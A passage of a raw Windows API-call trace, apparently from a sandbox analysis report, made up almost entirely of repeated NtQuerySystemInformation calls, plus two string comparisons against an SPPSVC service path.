(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.272] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.282] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.298] NtQuerySystemInformation 